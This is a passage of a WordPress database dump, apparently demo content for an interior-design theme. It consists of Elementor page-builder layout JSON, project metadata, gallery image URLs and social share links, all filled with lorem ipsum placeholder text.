fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(708,613,'_elementor_page_assets','a:0:{}'),(709,613,'_thumbnail_id','1153'),(711,619,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(712,619,'ova_project_service','Interior design'),(713,619,'ova_project_architect','Mike hardson'),(714,619,'ova_project_duration','4.5 Months'),(715,619,'ova_project_location','Broklyn, New York'),(716,619,'_elementor_edit_mode','builder'),(717,619,'_elementor_template_type','wp-post'),(718,619,'_elementor_version','3.6.6'),(719,619,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:87:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/vintage-design/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:94:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/vintage-design/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:102:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/vintage-design/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:88:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/vintage-design/\";}}'),(720,619,'_wp_page_template','default'),(721,619,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vintage design\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(722,619,'_elementor_page_assets','a:0:{}'),(723,619,'_thumbnail_id','1154'),(725,624,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(726,624,'ova_project_service','Interior design'),(727,624,'ova_project_architect','Mike hardson'),(728,624,'ova_project_duration','4.5 Months'),(729,624,'ova_project_location','Broklyn, New York'),(730,624,'_elementor_edit_mode','builder'),(731,624,'_elementor_template_type','wp-post'),(732,624,'_elementor_version','3.6.6'),(733,624,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:84:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/simple-home/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:91:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/simple-home/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:99:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/simple-home/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:85:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/simple-home/\";}}'),(734,624,'_wp_page_template','default'),(735,624,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Simple home\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting 